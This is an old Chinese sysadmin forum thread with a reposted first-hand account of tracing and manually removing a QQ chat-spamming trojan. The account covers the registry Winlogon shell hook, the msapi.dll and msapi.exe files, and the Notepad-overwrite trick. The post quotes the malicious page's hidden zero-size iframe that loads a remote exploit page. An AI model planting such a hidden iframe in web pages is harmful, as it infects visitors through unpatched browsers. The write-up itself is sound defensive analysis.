标题: [病毒讨论] [注意]QQ新尾巴病毒手动清除记 (查看:1741 回复:3)
雁过留声
初级网管




UID 37416
精华 0
积分 100
帖子 37
MST币 669 点    
BST币 100 点    赚取
阅读权限 80
注册 2004-10-23
来自 山东东营
状态 离线
 
[ 使用道具 ]  
发表于 2005-1-26 23:43  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
爱琴思邮件系统iGENUS V5.0
[注意]QQ新尾巴病毒手动清除记
本帖发表在我是网管论坛,帖子地址:http://bbs.54master.com/9869,1,1
QQ新尾巴病毒手动清除记
作者:未知  
转自:http://soft.yesky.com
  昨天办公室里刚帮别人装好的一台机器被同事玩qq染上了病毒,他无意中点击了别人给他发来信息里的网址,说可以免费得qq币,以前看到过此类qq病毒,但一直没有机会接触,于是就找杀毒软件杀,下了金山的qq病毒专杀工具,查到内存里有Win32.Troj.QQMydj2005dl.125440,但是杀一下,屏幕马上又重新启动了一下shell(也就是explorer),再运行qq还是一样,病毒依旧。




  呵呵,看来内存里的进程没清掉,文件扫描并没发现有病毒.于是想先把ie打补丁,但补丁却提示我的ie6不是ie6,补丁也打不上,于是我想就看看到底这个网站作了什么手脚.
  "我不下地狱谁下地狱"想起了佛祖为了拯救世人而所做的,我做了一个愚蠢而鲁莽的决定决定用我的机器染一次病毒,但我却范了一个严重的错误,忘记了备份注册表(以后要考虑周全再行事,各位千万不要学我啊)后果可想而知,我的qq也一样,只要一点用户聊天,病毒自己就会定时的粘贴一些垃圾和网址到发送对话框中,并自动发送。如此开始了我的手动清除之旅,我用一个httpdebug调试器,开始连接调试qq上发过来的那个网站,然后察看它网页的源代码又上网查找相关的漏洞,原来是ie的iframe漏洞,它可以嵌入别的网页,但存在着缓冲区漏洞,如果恶意网页构造特定的内容就可以让未补丁的ie客户机执行任意指令。发现问题在这里
  〈Iframe src="http://www.joyiex.com/dq.htm" width="0" height="0" scrolling="no"
frameborder="0"〉〈/iframe〉
  〈noscript〉〈iframe src=*〉〈/iframe〉〈/noscript〉
  又开始连接dq.htm,结果又得到
  
  
  
  看来是个asp,接着连接dq.asp结果得到的如下图。




  不是把,我主页,搜索页等等都被它替换了,最可气连regedit都给我禁止了我作了个解锁的reg文件,这个文件网上很多,总算能编辑注册表了,看了看Run键值并未有什么可疑程序,又下了个3721的ie修复,还原了一下ie的各设置,但qq病毒还是没弄掉,于是我用vc自带的进程查看器pview和spy++查看一下有什么进程可疑,但都没发现,突然想起金山qq专杀可以看到那个进程号,于是就发现那个进程id是explorer,这是shell进程,看来是病毒是通过explorer执行了其他程序,于是确定硬盘上一定有它的文件,这回又使用了一下金山qq专杀,把内存项去掉了。




  只查找c:盘,结果是有一个病毒,但列表中并没出现哪个文件,于是又多次查找,终于大概看到是ms打头的文件,于是直接到目录查看,看到有msapi.dll,msapi.exe两个文件是染毒时间产生的,基本判断是这两个文件了。.exe 可以删掉,但马上又会新产生一个,.dll删不掉,看来内存中的程序是以dll形态运行着,如果发现.exe不存在就生成一个新的,于是又到注册表里搜索msapi,终于发现在winlogin 的子键shell里有,呵呵总算找到它了,下面把它删除了,但是再一看又出来了,看来内存中的程序一直监控着这个键值,它是下次系统启动病毒正确执行的关键。




  既然内存中的先清除不了,但.exe文件可以删除于是我把记事本程序改了成msapi.exe拷了过去,覆盖了病毒的msapi.exe,重新启动机器,哈,和预想的一样,记事本出来了,内存中应该没有病毒了,手动删除掉msapi.dll和注册表里的键值,就这样问题解决了。
  最后总结一下所得到的经验和教训,看来开机启动运行的程序不一定都在RUN键值里,用explorer启动的程序在进程中只是显示explorer,分析这样的程序时最好先用工具备份注册表,最后觉得这个程序应该算是后门程序,在这里,希望和大家分享一下这个经历,本人文字功夫有限,有理解不对的地方还望大家指正。


[ 点这里复制网址,推荐给你QQ/MSN上的好友们! ]
本站声明:以上内容由网友 雁过留声 提供,与54master立场无关!
[ 顶部 ]
日王
初级网管




UID 302874
精华 0
积分 100
帖子 8
MST币 665 点    
BST币 100 点    赚取
阅读权限 80
注册 2004-3-1
状态 离线
 
[ 使用道具 ]  
发表于 2005-1-27 01:05  [ 资料 ]  [ 博客 ]  [ 主页 ] [ 短消息 ]  [ 加为好友
[注意]QQ新尾巴病毒手动清除记
顶!

本站声明:以上内容由网友 日王 提供,与54master立场无关!
[ 顶部 ]
kissbad
学徒网管




UID 212841
精华 0
积分 0
帖子 1
MST币 665 点    
BST币 0 点    赚取
阅读权限 60
注册 2005-1-26
状态 离线
 
[ 使用道具 ]  
发表于 2005-1-27 01:35  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
[注意]QQ新尾巴病毒手动清除记
直接告诉我们 怎么杀毒的步骤 就行了! 说了这么多废话 看得我眼睛都累了!。。但起码有了重点 值得一顶 。。!

本站声明:以上内容由网友 kissbad 提供,与54master立场无关!
[ 顶部 ]
fan365
学徒网管




UID 283201
精华 5
积分 5
帖子 141
MST币 865 点    
BST币 5 点    赚取
阅读权限 60
注册 2005-1-21
来自 陕西西安
状态 离线
 
[ 使用道具 ]  
发表于 2005-1-27 02:18  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
[注意]QQ新尾巴病毒手动清除记
写的不错,好象最近的一些病毒都用了上面的技术

本站声明:以上内容由网友 fan365 提供,与54master立场无关!
《我是网管》论坛
[ 顶部 ]
  
 



当前时区 GMT+8, 现在时间是 2008-7-24 16:18

Powered by Discuz! 5.5.0  © 2001-2007 Comsenz Inc.
Processed in 0.106730 second(s), 12 queries , Gzip enabled

清除 Cookies - 关于我是网管 - 联系我是网管 - 广告服务 - 诚聘版主 - 无图版 - WAP -